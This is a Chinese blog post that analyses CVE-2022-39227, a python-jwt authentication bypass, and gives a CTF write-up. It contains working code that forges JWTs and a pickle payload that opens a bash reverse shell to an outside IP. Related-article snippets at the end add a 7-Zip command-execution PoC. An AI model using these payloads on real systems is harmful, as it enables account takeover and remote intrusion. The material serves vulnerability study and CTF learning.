记CVE-2022-39227-Python-JWT漏洞

最新推荐文章于 2024-07-31 14:30:10 发布
最新推荐文章于 2024-07-31 14:30:10 发布
阅读量1.9k 收藏 9
点赞数 4
文章标签: python web安全
Aiwin
本文链接:https://blog.csdn.net/weixin_53090346/article/details/134277438
版权

文章目录

前言

在Asal1n师傅的随口一说之下,说newstar week5出了一道祥云杯一样的CVE,于是自己也是跑去看了一下,确实是自己不知道的一个CVE漏洞,于是就从这道题学习到了python-jwt库中的身份验证绕过漏洞,顺带做了一下简单的代码分析。

影响版本

python-jwt < 3.3.4

漏洞分析

这个漏洞造成的原因更像是库的作者在编写代码的时候疏忽导致的,使得验证的payload内容和返回的payload内容并不是一个payload导致的,下面来简单分析一下。

先给出github上作者漏洞修补的大致payload,利用payload进行测试,如下:
python-jwt库地址

from json import *
from python_jwt import *
from jwcrypto import jwk

payload = {'role': "guest"}
key = jwk.JWK.generate(kty='oct', size=256)
jwt_json = generate_jwt(payload, key, 'HS256', timedelta(minutes=60))
[header, payload, signature] = jwt_json.split('.')
parsed_payload = loads(base64url_decode(payload))
parsed_payload['role'] = "admin"
fake = base64url_encode((dumps(parsed_payload,separators=(',', ':'))))#这里separators就是消除了空格,不加似乎也并不影响漏洞。
fake_jwt = '{" ' + header + '.' + fake + '.":"","protected":"' + header + '", "payload":"' + payload + '","signature":"' + signature + '"}'
print(fake_jwt)
token = verify_jwt(fake_jwt, key, ['HS256'])
print(token)
  1. 首先是刚进入前面的代码。
#判断是否存在可用的签名算法
    if allowed_algs is None:
        allowed_algs = []
#如果可用的签名算法不是列表,抛出异常
    if not isinstance(allowed_algs, list):
        # jwcrypto only supports list of allowed algorithms
        raise _JWTError('allowed_algs must be a list')
#以.分割jwt的三部分
    header, claims, _ = jwt.split('.')
#取出头部分进行base64解码和json解析
    parsed_header = json_decode(base64url_decode(header))
#取出头部算法中的alg参数,此处就是PS256,如果为空或算法不允许,则抛出异常
    alg = parsed_header.get('alg')
    if alg is None:
        raise _JWTError('alg header not present')
    if alg not in allowed_algs:
        raise _JWTError('algorithm not allowed: ' + alg)
#ignore_not_implemented默认就是False,遍历头部的键,是否在被JWS所支持,不支持抛出异常
    if not ignore_not_implemented:
        for k in parsed_header:
            if k not in JWSHeaderRegistry:
                raise _JWTError('unknown header: ' + k)
            if not JWSHeaderRegistry[k].supported:
                raise _JWTError('header not implemented: ' + k)
#对签名进行验证,对jwt进行解析,这里传入的jwt为原始的jwt字段
    if pub_key:
        token = JWS()
        token.allowed_algs = allowed_algs
        token.deserialize(jwt, pub_key)

这里的base64url_decode()是一个用于解码Base64 URL安全编码的函数。
Base64 URL安全编码将标准的Base64编码进行了一些修改,以便在URL中传输时不会产生冲突。
具体而言,它使用"-“替换”+“,使用”_“替换”/“,并且将结尾的”="去除,并且会忽略掉不是base64的字符。

  1. 进入到deserialize中对签名进行验证,代码如下:
    def deserialize(self, raw_jws, key=None, alg=None):
        self.objects = {}
        o = {}
        try:
            try:
			 #对传入的原始的jwt进行json解析
                djws = json_decode(raw_jws)
				#判断是否有多个签名,有则取出签名存放到列表当中
                if 'signatures' in djws:
                    o['signatures'] = []
                    for s in djws['signatures']:
                        os = self._deserialize_signature(s)
                        o['signatures'].append(os)
                        self._deserialize_b64(o, os.get('protected'))
				#单个签名的情况,直接从原始的jwt中取出签名字段,并且将protected以及header赋值给o对象返回
                else:
                    o = self._deserialize_signature(djws)
                    self._deserialize_b64(o, o.get('protected'))#是否继续base64解码

                if 'payload' in djws:#解析payload字段
                    if o.get('b64', True):
                        o['payload'] = base64url_decode(str(djws['payload']))
                    else:
                        o['payload'] = djws['payload']

            except ValueError:#如果json解析异常,则直接以. 分割,提取出三个部分分别赋值
                c = raw_jws.split('.')
                if len(c) != 3:
                    raise InvalidJWSObject('Unrecognized'
                                           ' representation') from None
                p = base64url_decode(str(c[0]))
                if len(p) > 0:
                    o['protected'] = p.decode('utf-8')
                    self._deserialize_b64(o, o['protected'])
                o['payload'] = base64url_decode(str(c[1]))
                o['signature'] = base64url_decode(str(c[2]))

            self.objects = o #将o赋值给objects对象

        except Exception as e:  # pylint: disable=broad-except
            raise InvalidJWSObject('Invalid format') from e

        if key:
            self.verify(key, alg)#将签名算法和key传入verify函数中

file

file

  1. verify()函数如下:
    def verify(self, key, alg=None, detached_payload=None):
        self.verifylog = []
		#默认验证是不通过的
        self.objects['valid'] = False
        obj = self.objects
        missingkey = False
        if 'signature' in obj:
            payload = self._get_obj_payload(obj, detached_payload)#直接提取出payload部分
            #直至这里,传入的解析部分还是原本正常的jwt的字符串,所以_verify也是通过的,将验证生效设置为了true
			try:
                self._verify(alg, key,
                             payload,
                             obj['signature'],
                             obj.get('protected', None),
                             obj.get('header', None))
                obj['valid'] = True
            except Exception as e:  # pylint: disable=broad-except
                if isinstance(e, JWKeyNotFound):
                    missingkey = True
                self.verifylog.append('Failed: [%s]' % repr(e))
		#多个签名的情况
        elif 'signatures' in obj:
            payload = self._get_obj_payload(obj, detached_payload)
            for o in obj['signatures']:
                try:
                    self._verify(alg, key,
                                 payload,
                                 o['signature'],
                                 o.get('protected', None),
                                 o.get('header', None))
                    # Ok if at least one verifies
                    obj['valid'] = True
                except Exception as e:  # pylint: disable=broad-except
                    if isinstance(e, JWKeyNotFound):
                        missingkey = True
                    self.verifylog.append('Failed: [%s]' % repr(e))
        else:
            raise InvalidJWSSignature('No signatures available')
		#如果签名验证不通过,抛出异常
        if not self.is_valid:
            if missingkey:
                raise JWKeyNotFound('No working key found in key set')
            raise InvalidJWSSignature('Verification failed for all '
                                      'signatures' + repr(self.verifylog))

这里经过验证码后的token其实是原本正常的jwt,跟伪造的payload还没有关系

file

  1. 代码继续往下走
#json解析.分割出来的中间部分,即我们而已构造的payload
 	parsed_claims = json_decode(base64url_decode(claims))
	#获取一些时间参数
    utcnow = datetime.utcnow()
    now = timegm(utcnow.utctimetuple())
#从header头中获取到类型JWT,并进行一些判断,不为JWT抛出异常
    typ = parsed_header.get('typ')
    if typ is None:
        if not checks_optional:
            raise _JWTError('typ header not present')
    elif typ != 'JWT':
        raise _JWTError('typ header is not JWT')
#从fakepayload中获取到iat的值即时间戳,判断令牌的签发时间是否有效
    iat = parsed_claims.get('iat')
    if iat is None:
        if not checks_optional:
            raise _JWTError('iat claim not present')
    elif iat > timegm((utcnow + iat_skew).utctimetuple()):
        raise _JWTError('issued in the future')
#获取jwt令牌的生效时间,此时是否有效
    nbf = parsed_claims.get('nbf')
    if nbf is None:
        if not checks_optional:
            raise _JWTError('nbf claim not present')
    elif nbf > now:
        raise _JWTError('not yet valid')
# 获取到令牌的过期即有效截止时间,判断令牌是否有效,如果小于现在时间,则过期
    exp = parsed_claims.get('exp')
    if exp is None:
        if not checks_optional:
            raise _JWTError('exp claim not present')
    elif exp <= now:
        raise _JWTError('expired')
# 返回.分割后的头部和中间部分即我们的fakepayload
    return parsed_header, parsed_claims

可以看出,在验证令牌的时候使用的是正常的JWT,而返回的却是以.分割的传入jwt的中间部分和头部,使得解析返回的payload和验证签名的pauload并不是一个payload,导致了身份绕过。

Newstar2023 Week5

题目给了源码如下:

# -*- coding: utf-8 -*-
import base64
import string
import random
from flask import *
import jwcrypto.jwk as jwk
import pickle
from python_jwt import *

app = Flask(__name__)


def generate_random_string(length=16):
    characters = string.ascii_letters + string.digits  # 包含字母和数字
    random_string = ''.join(random.choice(characters) for _ in range(length))
    return random_string


app.config['SECRET_KEY'] = generate_random_string(16)
key = jwk.JWK.generate(kty='RSA', size=2048)


@app.route("/")
def index():
    payload = request.args.get("token")
    if payload:
        token = verify_jwt(payload, key, ['PS256'])
        print(token)
        session["role"] = token[1]['role']
        return render_template('index.html')
    else:
        session["role"] = "guest"
        user = {"username": "boogipop", "role": "guest"}
        jwt = generate_jwt(user, key, 'PS256', timedelta(minutes=60))
        return jwt


@app.route("/pickle")
def unser():
    if session["role"] == "admin":
        pickle.loads(base64.b64decode(request.args.get("pickle")))
        return 'success'
    else:
        return 'fail'


if __name__ == "__main__":
    app.run(host="0.0.0.0", port=5000, debug=True)

题目的思路也是十分简单,通过伪造JWT,使得返回来的fake_payload中第二部分的role和admin,然后进行pickle反序列化即可。

  1. 利用原题目guest的jwwt直接进行伪造,绕过身份验证

file

from json import loads, dumps
from jwcrypto.common import base64url_encode, base64url_decode


def topic(topic):
    [header, payload, signature] = topic.split('.')
    parsed_payload = loads(base64url_decode(payload))
    print(parsed_payload)
    parsed_payload["role"] = "admin"
    print(dumps(parsed_payload, separators=(',', ':')))
    fake_payload = base64url_encode((dumps(parsed_payload, separators=(',', ':'))))
    print(fake_payload)
    return '{" ' + header + '.' + fake_payload + '.":"","protected":"' + header + '", "payload":"' + payload + '","signature":"' + signature + '"} '


print(topic('eyJhbGciOiJQUzI1NiIsInR5cCI6IkpXVCJ9.eyJleHAiOjE2OTkzNjkyMzcsImlhdCI6MTY5OTM2NTYzNywianRpIjoiTUV0SEJKX1JZeVR3MmhnUmZMcnFsdyIsIm5iZiI6MTY5OTM2NTYzNywicm9sZSI6Imd1ZXN0IiwidXNlcm5hbWUiOiJib29naXBvcCJ9.nw0s5c4lL0GtUBb7IJTbIhVTE7kzNg7s4l93PrhWZmYKuxWCyZmi7cKWE63Tv3Z6sdUQVp_7IlM8yiY32mNSOwRHCADWllFo18bmlXVri_qdWR-CCVkVi6npIliEBXl_Hbpnh64dCIQuY13-gr0Y412svenGADO-uubqxT3Ml7dlpnaDZ7F06ISkg_m4syc0DQpKKuQv4xFshMYHgaxCCkLpJCMHScIxSjSjoxpD3LnNjYRXgVue8R4TcZ75ZWgaSmkNUmHUrizdTFyi0GVutnaT1Nw4yZKkS5DZxAVUYqcARLUSGvWmt1pZnyny0eR23q7Z8X7Mw-LytE-XfmkAFQ'))
  1. 这里返回的session就是admin的session

file

  1. 触发pickle反序列化,反弹shell
import base64

p=b"(cos\nsystem\nS'bash -c \"bash -i >& /dev/tcp/120.79.29.170/5555 0>&1\"'\no"
payload=base64.b64encode(p)
print(payload)

file

总结

JWT的话题总是不息的,包括一些空认证等,nodejs中的数组绕过等等,漏洞也是频出。

M03-Aiwin
关注
  • 4
    点赞
  • 9
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
CVE-2022-39227jwt
qq_32445755的博客
11-12 1241
python jwt是一个用于生成和验证JSON Web令牌的模块。3.3.4之前的版本会受到欺骗绕过身份验证的影响,从而导致身份欺骗、会话劫持或身份验证绕过。获得JWT的攻击者可以在不知道密钥的情况下任意造其内容。根据应用程序的不同,这可能使攻击者能够欺骗其他用户的身份、劫持他们的会话或绕过身份验证。用户应升级到版本3.3.4。没有已知的解决方法。
第二届祥云杯 Web 题解1
08-03
考点:SSRF、session条件竞争随意用户名都可以登陆,接着是SSRF的内容,通过访问 http://127.0.0.1/admin/ ,获得include
CVE-2022-33891POC Apache Spark 命令注入(CVE-2022-33891)POC
08-10
CVE-2022-33891POC Apache Spark 命令注入(CVE-2022-33891)POC CVE-2022-33891 影响版本 Apache spark version<3.0.3 3.1.1<Apache spark 版本<3.1.2 Apache Spark version>= 3.3.0 修复方案 1.建议升级到安全版本,参考官网链接: https://spark.apache.org/downloads.html 2.安全设备路径添加黑名单或者增加WAF规则(临时方案)。
Python-JWT身份验证绕过(CVE-2022-39227)
zls1793的博客
01-01 1434
python-jwt库中的verify_jwt()存在身份验证绕过漏洞
祥云杯2022复现
your_friends的博客
11-13 1018
这个CVE漏洞就是不需要公钥以及私钥就能构造出jwt的认证,稍作修改就可以更改:将里面的sub=bob改成is_admin=1然后拿出来输出一下。而我们点击页面的各种功能提示都是权限不够,那么这里也就是需要构造is_admin=1,在jwt这个版本更新之后,留下了检测是否存在漏洞的poc。苦于没有环境,我就只能口述了,利用graphql注入,注入出账号密码,最终登陆拿到flag。我这里只复现一下这个jwt造了,grahql只能纸上谈兵的看看了并不能实操。抓包的时候有一串jwt,解码出来之后可以看到。
CVE-2022-29072(7z漏洞复现及对应措施)
qq_43696276的博客
04-23 1769
CVE-2022-29072(7z漏洞复现及对应措施) 首先,找个txt文本,将以下代码输入: <html> <head> <HTA:APPLICATION ID="7zipcodeexec"> <script language="jscript"> var c = "cmd.exe"; new ActiveXObject('WScript.Shell').Run(c); </script> <head> <html> 然
sudo-1.9.12p1,解决cve-2022-43995
11-08
"sudo-1.9.12p1"是sudo的一个特定版本,该版本发布是为了修复一个重要的安全漏洞CVE-2022-43995。 **sudo的基础知识** sudo的核心功能在于提供一种受控的权限提升机制,以增强系统的安全性。它通过sudoers文件来...
春秋云境 CVE-2022-4230 夺旗
05-02
**CVE-2022-4230** 是一个存在于 **WP Statistics** WordPress 插件(版本13.2.9及以前)中的安全漏洞。该漏洞的主要原因是插件在处理特定参数时没有进行充分的数据转义,从而导致SQL注入攻击成为可能。具体来说: ...
XStream拒绝服务漏洞(CVE-2022-41966)响应通告
05-05
XStream拒绝服务漏洞(CVE-2022-41966)响应通告
CVE-2022-33891漏洞原理、环境搭建和复现
qq_44767905的博客
07-25 8753
CVE-2022-33891漏洞原理、环境搭建和复现
祥云杯2022 writeup
渗透测试研究中心
11-02 1945
0x01 web1.ezjava下载源码对jar文件进行反编译,发现POST /myTest会出现反序列化漏洞util ,最后好像没用到检查程序,发现apache的common−collections4,而且其反序列化利用类未被Patch一眼看到 commons-collection4-4.0, 于是直接用 ysoserial 打考点发现就是cc4附上文章外加spring−ech网上有现成的...
Selenium与WebDriver:Errno 8 Exec格式错误的多种解决方案
ip16yun的博客
07-30 364
在使用Selenium和WebDriver进行网页自动化时,可能会遇到各种错误。其中一个常见问题是执行格式错误(Errno 8 Exec format error)。这个错误通常在运行ChromeDriver时出现,错误提示涉及路径中的某个文件。本文将概述这个问题的背景,并提供多种解决方案,包括如何使用代理IP技术进行数据抓取。
Chapter 18 Python异常
2302_80253507的博客
07-28 1310
Python中,异常是一种特定的对象,能够在程序运行过程中被抛出和处理。有效地管理异常不仅可以增强程序的稳定性,还可以提高用户体验,使程序能够优雅地处理错误情况。本章详细讲解了异常的基本概念以及如何捕获和处理异常。
python字符串数据容器练习(replace,split,count)
最新发布
2301_79600015的博客
07-31 400
Python字符串是由一系列字符组成的数据类型。在Python中,字符串是不可变的,这意味着一旦创建了一个字符串,就不能修改它的内容。以下是关于Python字符串的一些重要知识点:1. 字符串的基本操作:拼接字符串:使用`+`运算符。重复字符串:使用`*`运算符。索引和切片:使用`[]`和`:`操作符访问字符串中的子串。长度:使用`len()`函数获取字符串长度。转换大小写:使用`upper()`和`lower()`方法。分割和连接:使用`split()`和`join()`方法。
loguru日志模块:简化Python自动化测试的日志管理!
07-29 831
日志是软件开发中的关键组成部分,为开发和测试人员提供了调试和监控应用程序的重要手段。loguru 是一个第三方的 Python 日志库,以其简洁的 API 和自动化的功能脱颖而出。本文将探讨为什么项目中需要日志,loguru 为何受到青睐,以及如何封装和在接口自动化测试项目中使用 loguru,同时结合 Allure 生成丰富的测试报告。
Python(C++)大尺度分层边值时变图统计推理并行算法
跨学科知识视角展现
07-29 1049
:dart:分层结构制定生成模型 | :dart:贝叶斯模型选择程序 | :dart:分层结构图的信息性 | :dart:分层模型适应实值边协变量的网络 | :dart:分层模型适应时变网络,划分层对应于检测变化点 | :dart:定义两种版本随机块模型::pen:具有边缘协变量模型概率分布,分层图总似然 | :pen:独立分层模型分层图数学似然计算 | :dart:推理算法:大图形尺度并行计算算法,过滤暂时被遮蔽的节点和边
Python入门知识点 10--闭包与装饰器
@网工小赵的博客
07-30 910
什么情况下会用到装饰器特性:在不修改源代码的基础上,给函数加功能。
cve-2022-41741
06-22
CVE-2022-41741是一个安全漏洞的编号,它通常指的是软件中的一个已知安全问题。这种漏洞可能会影响各种系统和应用程序,包括但不限于Web服务器、数据库软件或其他类型的软件。具体的CVE-2022-41741描述可能涉及到代码执行、数据泄露、拒绝服务攻击或其他类型的威胁。 由于我是一个模型,我并不能实时查看最新的漏洞详情。然而,我可以告诉你一般CVE漏洞的含义:CVE代表"Common Vulnerabilities and Exposures"(通用漏洞及暴露),是由美国CERT Coordination Center(CERT/CC)维护的一个数据库,用于录全球公开的安全漏洞。每个CVE ID都是唯一的,有助于跟踪和理解不同系统的安全状况。 如果你想知道CVE-2022-41741的具体信息,建议查阅相关安全更新、厂商公告或通过权威的安全资源网站(如CVE Details、NVD等)查询最新详情。同时,保持你的系统和软件更新到最新版本,以修复可能存在的安全风险。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

M03-Aiwin

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值